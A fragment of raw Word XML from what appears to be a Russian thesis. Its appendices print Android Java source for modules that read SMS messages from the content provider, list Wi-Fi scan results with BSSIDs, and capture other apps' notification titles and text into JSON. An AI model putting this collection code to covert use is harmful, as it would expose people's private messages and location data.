              <w:t xml:space="preserve">status, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Bundle </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>extras) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006657C4" w:rsidRPr="00355B45" w:rsidRDefault="006657C4" w:rsidP="006657C4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00355B45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E447A" w:rsidRDefault="00753BE3" w:rsidP="001E447A">
      <w:pPr>
        <w:pStyle w:val="110"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc61505586"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ</w:t>
      </w:r>
      <w:r w:rsidRPr="001E447A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>И</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
      <w:r w:rsidR="001E447A" w:rsidRPr="001E447A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006657C4" w:rsidRPr="001E447A" w:rsidRDefault="001E447A" w:rsidP="001E447A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001E447A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Исходный код </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">модуля </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMS</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB60A5" w:rsidRPr="00F870DF" w:rsidTr="00DB60A5">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android.database.Cursor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android.net.Uri</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Sms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Uri uri </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rP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"content://sms/"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 xml:space="preserve">Cursor cursor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w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                    .query(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while </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>cursor</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.moveToNext()) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">String type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"body"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"date"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"type"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>type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type</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.equals(</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"3"</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Cursor c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"content://mms-sms/conversations?simple=true"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 xml:space="preserve">"_id ="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"thread_id"</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c</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.moveToFirst())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IllegalArgumentException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DB60A5" w:rsidRDefault="00DB60A5" w:rsidP="00DB60A5">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A01E47" w:rsidRDefault="00A01E47" w:rsidP="00DB60A5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A01E47" w:rsidRDefault="00A01E47">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E447A" w:rsidRDefault="00753BE3" w:rsidP="001E447A">
      <w:pPr>
        <w:pStyle w:val="110"/>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc61505587"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ</w:t>
      </w:r>
      <w:r w:rsidRPr="001E447A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>К</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
      <w:r w:rsidR="001E447A" w:rsidRPr="001E447A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006657C4" w:rsidRDefault="001E447A" w:rsidP="001E447A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001E447A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Исходный код </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">модуля </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wi</w:t>
      </w:r>
      <w:r w:rsidRPr="001E447A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fi</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A01E47" w:rsidRPr="00F870DF"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android.net.wifi.ScanResult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android.net.wifi.WifiManager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android.util.Log</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android.widget.Toast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java.util.List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Wifi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WifiManager wifiManager </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>= (</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>WifiManager</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>context</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                    </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.getApplicationContext()</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                    .getSystemService(</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i/>
                <w:iCs/>
                <w:color w:val="871094"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>WIFI_SERVICE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wifiManager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wifiManager</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.isWifiEnabled()) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">List scans </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>wifiManager</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.getScanResults();</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scans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scans</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">.size() &gt;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scans</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.size(); i++) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                        </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ScanResult scan </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>= (</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ScanResult</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>scans</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.get(i);</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BSSID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Throwable </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>th) {</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080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>makeText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"Wifi.scan"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871094"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LENGTH_SHORT</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="871094"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>).show();</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Log</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"Mta.SDK"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"isWifiNet error"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, th);</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6657C4" w:rsidRPr="00355B45" w:rsidRDefault="006657C4" w:rsidP="006657C4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00355B45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E447A" w:rsidRDefault="00753BE3" w:rsidP="001E447A">
      <w:pPr>
        <w:pStyle w:val="110"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc61505588"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ</w:t>
      </w:r>
      <w:r w:rsidRPr="001E447A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Л</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
      <w:r w:rsidR="001E447A" w:rsidRPr="001E447A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006657C4" w:rsidRDefault="001E447A" w:rsidP="001E447A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001E447A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Исходный код </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>модуля уведомлений</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A01E47" w:rsidRPr="00F870DF"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android.app.Notification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android.content.Intent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android.os.IBinder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android.service.notification.NotificationListenerService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android.service.notification.StatusBarNotification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NotificationListener </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0033B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">extends </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">NotificationListenerService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w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">IBinder </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="00627A"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>onBind</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Intent </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>intent) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0033B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>return super</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.onBind(intent);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void </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="00627A"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>onNotificationPosted</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">StatusBarNotification </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sbn)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appName </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>= sbn.getPackageName();</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appName</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.equals(getPackageName()))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String title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.getString(</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CharSequence charSequenceContent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.getCharSequence(</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w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">content = </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w: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charSequenceContent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content = </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>charSequenceContent</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long </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">postTime </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>= sbn.getPostTime();</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">String uniqueKey </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>= sbn.getKey();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JSONObject data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"appName"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>appName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"title"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>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"content"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">"" </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>+ content);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"postTime"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
